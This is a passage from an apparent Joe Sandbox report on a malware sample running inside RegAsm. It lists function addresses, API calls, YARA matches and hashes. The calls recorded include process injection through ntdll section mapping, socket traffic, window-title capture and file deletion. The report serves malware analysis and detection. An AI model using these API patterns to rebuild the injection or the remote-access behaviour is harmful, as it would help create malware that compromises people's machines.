                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateEventStartupsocket
                          • String ID:
                          • API String ID: 1953588214-0
                          • Opcode ID: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                          • Instruction ID: ed99eca956a2b7a9b5891d615cc725ddac26720bb1770143763ad27df005c20f
                          • Opcode Fuzzy Hash: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                          • Instruction Fuzzy Hash: 760171B1408B809ED7359F38A8456877FE0AB55304F048D6EF1DA97B91D3B5A881CB18
                          Function 10001EEC Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                          Download Yara Rule
                          APIs
                          • dllmain_crt_process_attach.LIBCMT ref: 10001F22
                          • dllmain_crt_process_detach.LIBCMT ref: 10001F35
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: dllmain_crt_process_attachdllmain_crt_process_detach
                          • String ID:
                          • API String ID: 3750050125-0
                          • Opcode ID: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                          • Instruction ID: 876e10da87b92cf64c449b9c471687dd08192407587f6dd1e67cbf7e6a41b987
                          • Opcode Fuzzy Hash: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                          • Instruction Fuzzy Hash: A0E0D83646820BEAFB11EEB498156FD37D8EB011C1F100536B851C115ECB39EB90F121
                          Function 0040165E Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e70bc1220f3c0aaa69c113e67994fb024de36f7e04ed45e289cd83dd41bab85d
                          • Instruction ID: 1e9d0a06bdb6e9f7b23a96960dfc4b712b0be9606a3b942e14a6d4fe6a34620f
                          • Opcode Fuzzy Hash: e70bc1220f3c0aaa69c113e67994fb024de36f7e04ed45e289cd83dd41bab85d
                          • Instruction Fuzzy Hash: EBF0E2706042016BCB0C8B34CD50B2A37954B84325F248F7FF02BD61E0C73EC8918A0D
                          Function 0041BB27 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                          Download Yara Rule
                          APIs
                          • GetForegroundWindow.USER32 ref: 0041BB49
                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041BB5C
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Window$ForegroundText
                          • String ID:
                          • API String ID: 29597999-0
                          • Opcode ID: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                          • Instruction ID: 8c7c0eb369f00208a7459315ff6bb8442305c4ed6b2016914032ba092e23deac
                          • Opcode Fuzzy Hash: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                          • Instruction Fuzzy Hash: 21E04875A00328A7E720A7A5AC4EFD5776C9708755F0001AEBA1CD61C2EDB4AD448BE5
                          Function 00414F24 Relevance: 3.0, APIs: 2, Instructions: 21networkCOMMON
                          Download Yara Rule
                          APIs
                          • getaddrinfo.WS2_32(00000000,00000000,00000000,00472ADC,004750E4,00000000,004151C3,00000000,00000001), ref: 00414F46
                          • WSASetLastError.WS2_32(00000000), ref: 00414F4B
                            • Part of subcall function 00414DC1: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                            • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414E52
                            • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                            • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414E79
                            • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414EB1
                            • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                            • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                            • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                          • String ID:
                          • API String ID: 1170566393-0
                          • Opcode ID: 63e6a57adcb3e9d376df8b1f7a36805de8af56205c6b0d3f673684859221182d
                          • Instruction ID: 64a5677b7ab27dcaa32d5743096e05a6e92bfc5102e3e8065abb212a99eff034
                          • Opcode Fuzzy Hash: 63e6a57adcb3e9d376df8b1f7a36805de8af56205c6b0d3f673684859221182d
                          • Instruction Fuzzy Hash: 23D017322005316BD320A769AC00AEBAA9EDFD6760B12003BBD08D2251DA949C8286E8
                          Function 100038E8 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 10003AF1: try_get_function.LIBVCRUNTIME ref: 10003B06
                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003906
                          • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 10003911
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                          • String ID:
                          • API String ID: 806969131-0
                          • Opcode ID: 85dde84de96db858e9ac955eb0900af54eb95c15fda99a7601862167fd99e8cb
                          • Instruction ID: 7b09b9f0a56a55c342e0a0cde292dff0536b901afa775ab746cb2a45ce2dbbc5
                          • Opcode Fuzzy Hash: 85dde84de96db858e9ac955eb0900af54eb95c15fda99a7601862167fd99e8cb
                          • Instruction Fuzzy Hash: 50D0223A8087431CF80BC6BD2C67A8B23CCCB421F4360C2A6F7209A0CDEF60E0046322
                          Function 0043A46C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00438E14: try_get_function.LIBVCRUNTIME ref: 00438E29
                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A48A
                          • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0043A495
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                          • String ID:
                          • API String ID: 806969131-0
                          • Opcode ID: 7c89d40c7eedfd0dbade414ce873565ce9a5339007f2f4ce9f715b5c80c9974a
                          • Instruction ID: eb5cae5cbee30b1ad319c652a9e61f9a188d1dba44d7e0681113cf8ff6ee03f7
                          • Opcode Fuzzy Hash: 7c89d40c7eedfd0dbade414ce873565ce9a5339007f2f4ce9f715b5c80c9974a
                          • Instruction Fuzzy Hash: 34D0A725584340141C04A279381B19A1348193A778F70725FF5A0C51D2EEDD4070512F
                          Function 004185A3 Relevance: 2.5, APIs: 2, Instructions: 18COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                            • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 00418174
                            • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                            • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 00418188
                            • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                            • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 0041819C
                            • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                            • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 004181B0
                            • Part of subcall function 0041812A: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                            • Part of subcall function 0041812A: VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                          • CloseHandle.KERNEL32(004040F5), ref: 004185B9
                          • CloseHandle.KERNEL32(00465E84), ref: 004185C2
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Handle$AddressModuleProc$Close$AllocCreateProcessVirtual
                          • String ID:
                          • API String ID: 2948481953-0
                          • Opcode ID: 434d97dd539276bb1b15e641649fa57fd1217911ab9ffb100551eca57c0074db
                          • Instruction ID: c73268819cb60d4ae5e82c4b87b0b0ed6d20300d6cd2269ac6e8254bb02e1260
                          • Opcode Fuzzy Hash: 434d97dd539276bb1b15e641649fa57fd1217911ab9ffb100551eca57c0074db
                          • Instruction Fuzzy Hash: 4FD05E76C4120CFFCB006BA4AC0E8AEB77CFB09211B50116AEC2442252AA369D188A64
                          Function 10005C45 Relevance: 1.6, APIs: 1, Instructions: 65COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 10005CB2
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: __crt_fast_encode_pointer
                          • String ID:
                          • API String ID: 3768137683-0
                          • Opcode ID: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                          • Instruction ID: bece27fcde9612dcc576c905fc453b1e46dde912844247b60aafe4dc7e802519
                          • Opcode Fuzzy Hash: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                          • Instruction Fuzzy Hash: D0118F37A007259FFB26DE18DD9095B73E5EB843E17168220ED18AB258DA32EC0196A1
                          Function 004118ED Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3a029944d771eb8a1b2846a7b5ac2838134afd3be6a211902ab956b72bc11154
                          • Instruction ID: 3af98ca860494c99acd04ebe2bb4cc6dc665ec8dea8eb108ba88c8789d347e54
                          • Opcode Fuzzy Hash: 3a029944d771eb8a1b2846a7b5ac2838134afd3be6a211902ab956b72bc11154
                          • Instruction Fuzzy Hash: 9411E3B27201019FD7149B18C860BA6B766FF50710F5942AAE256CB3B2DB35EC91CA98
                          Function 0043AA9B Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: __alldvrm
                          • String ID:
                          • API String ID: 65215352-0
                          • Opcode ID: 0fb042ee673182d0a975c8eeaa188f9506240d203db94b7081741dab0a726564
                          • Instruction ID: 3aa9a871bb282a4e2fa9f206226bba5a96c76ae51e783e445703a1682bb04715
                          • Opcode Fuzzy Hash: 0fb042ee673182d0a975c8eeaa188f9506240d203db94b7081741dab0a726564
                          • Instruction Fuzzy Hash: 51014CB2950308BFDB24EF64C902B6EBBECEB04328F10452FE445D7201C278AD40C75A
                          Function 004461B8 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                          • Instruction ID: 139fbca062bb8bf671a891d82c3cf8fc988f9ce198a1a8b78c24da0334343556
                          • Opcode Fuzzy Hash: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                          • Instruction Fuzzy Hash: CEE0E531A0021267F6312A269C01B5B76599B437A0F170137AD15922D2CE6CCD0181EF
                          Function 0040489E Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                          Download Yara Rule
                          APIs
                          • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Startup
                          • String ID:
                          • API String ID: 724789610-0
                          • Opcode ID: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                          • Instruction ID: 97c3e6bab4f4407137ad71e204409d8be70fba83985c90e8682379c152a4c00d
                          • Opcode Fuzzy Hash: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                          • Instruction Fuzzy Hash: 92D0123255C70C8EE620ABB4AD0F8A4775CC317616F0007BA6CB5836D3E6405B1DC2AB
                          Function 00418691 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                          Download Yara Rule
                          APIs
                          • GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: FromGdipImageLoadStream
                          • String ID:
                          • API String ID: 3292405956-0
                          • Opcode ID: 622fa0b139d9c8e49d1b860aa3f0d2c71aabae9c10a97b9ae04fddd858742a73
                          • Instruction ID: 43760c1b0819a338a5deeaaf53a1808d78fb0d0861515ad37458d280f23f523c
                          • Opcode Fuzzy Hash: 622fa0b139d9c8e49d1b860aa3f0d2c71aabae9c10a97b9ae04fddd858742a73
                          • Instruction Fuzzy Hash: B0D0C9B6514310AFC3619F04DC40AA2B7E8EB15312F11C82BA8D5C2620D7749C488B54
                          Function 00418706 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                          Download Yara Rule
                          APIs
                          • GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: GdipImageSaveStream
                          • String ID:
                          • API String ID: 971487142-0
                          • Opcode ID: 2b14b1dce46a2bfe4ee8223d47c11625fbcfce4f614b1a3c8f6551cdff2dc83b
                          • Instruction ID: 4096a07c3c24ce64e1baa665156051a68d3341f73ff607d033811f23ed9a4a9b
                          • Opcode Fuzzy Hash: 2b14b1dce46a2bfe4ee8223d47c11625fbcfce4f614b1a3c8f6551cdff2dc83b
                          • Instruction Fuzzy Hash: 12C0C932008351AB8B529F449C05C5FBAA6BB98211B044C1EF15541120CB258C659B5A
                          Function 00404BE5 Relevance: 1.5, APIs: 1, Instructions: 11threadCOMMON
                          Download Yara Rule
                          APIs
                          • CreateThread.KERNEL32(00000000,00000000,Function_00004C01,004758E8,00000000,00000000), ref: 00404BF8
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateThread
                          • String ID:
                          • API String ID: 2422867632-0
                          • Opcode ID: 93ba778880e199ddb191fa863179a72969e2b1c83519dbb18fcdc4b7e209d100
                          • Instruction ID: 9d5c7c84f515cf35c3e932a45e486dbb5327be38257a8aa591cdad7e466f248e
                          • Opcode Fuzzy Hash: 93ba778880e199ddb191fa863179a72969e2b1c83519dbb18fcdc4b7e209d100
                          • Instruction Fuzzy Hash: 22C04CF1515200BFBA00CB60CD89C37B69DD750701715C8697908D2141D576DC01D538
                          Function 004027A7 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                          Download Yara Rule
                          APIs
                          • std::_Deallocate.LIBCONCRT ref: 00402E2B
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Deallocatestd::_
                          • String ID:
                          • API String ID: 1323251999-0
                          • Opcode ID: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                          • Instruction ID: a1ed0c2070530d0d1545540182683da5b3cb4a6c90a46b83737b9b29f97d9faa
                          • Opcode Fuzzy Hash: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                          • Instruction Fuzzy Hash: FFB092364442007ACA026640AC86F5EB762ABA4710F14C92ABA9A281E2D6B74268A647
                          Function 00426D42 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: recv
                          • String ID:
                          • API String ID: 1507349165-0
                          • Opcode ID: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                          • Instruction ID: c63eaffdb417a6470c671315a396a42075a312041b5b8b5670d44767818a4bbd
                          • Opcode Fuzzy Hash: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                          • Instruction Fuzzy Hash: 26B09279108202FFCA150B60CC0886ABEA6ABC8382B00882DB586411B0C736C851AB26
                          Function 00426D59 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: send
                          • String ID:
                          • API String ID: 2809346765-0
                          • Opcode ID: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                          • Instruction ID: 21703143275c54c82102de5c78eddca0fb0a16d203a0de67c7bd570fb3111ac2
                          • Opcode Fuzzy Hash: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                          • Instruction Fuzzy Hash: 87B09B75108301FFD6150760CC0486A7D6597C8341F00491C718741170C635C8515725
                          Function 004186B4 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                          Download Yara Rule
                          APIs
                          • GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: DisposeGdipImage
                          • String ID:
                          • API String ID: 1024088383-0
                          • Opcode ID: 0ec9bc49c4904e7bb4143567628e623777d6e2ea47272714c4fc696535c6f937
                          • Instruction ID: d9118485f6a3d23189d012adfd41c145ee3959ede018d2d91b25300b670f9ca3
                          • Opcode Fuzzy Hash: 0ec9bc49c4904e7bb4143567628e623777d6e2ea47272714c4fc696535c6f937
                          • Instruction Fuzzy Hash: E1A001B4815601DF8F025F609A48A647FA5AB4630A3248199D4898A222D77BC857DE6A
                          Function 00411CDE Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                          • Instruction ID: 079a7b638a28e99b338f4493b6ebfa8105bff269478f0661155a893ef6bf0f7e
                          • Opcode Fuzzy Hash: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                          • Instruction Fuzzy Hash: 13B00872418382EBCF02DF90DD0492ABAB2BB88741F184C5CB2A14107187228428EB06

                          Non-executed Functions

                          Function 00407CD2 Relevance: 44.6, APIs: 10, Strings: 15, Instructions: 835filesleepCOMMON
                          Download Yara Rule
                          APIs
                          • SetEvent.KERNEL32(?,?), ref: 00407CF4
                          • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
                          • DeleteFileW.KERNEL32(00000000), ref: 00407DE4
                            • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,`.|,004752F0,00000001), ref: 0041C37D
                            • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,`.|,004752F0,00000001), ref: 0041C3AD
                            • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,`.|,004752F0,00000001), ref: 0041C402
                            • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,`.|,004752F0,00000001), ref: 0041C463
                            • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,`.|,004752F0,00000001), ref: 0041C46A
                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                            • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                            • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
                          • GetLogicalDriveStringsA.KERNEL32 ref: 004082B3
                          • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
                          • DeleteFileA.KERNEL32(?), ref: 0040868D
                            • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
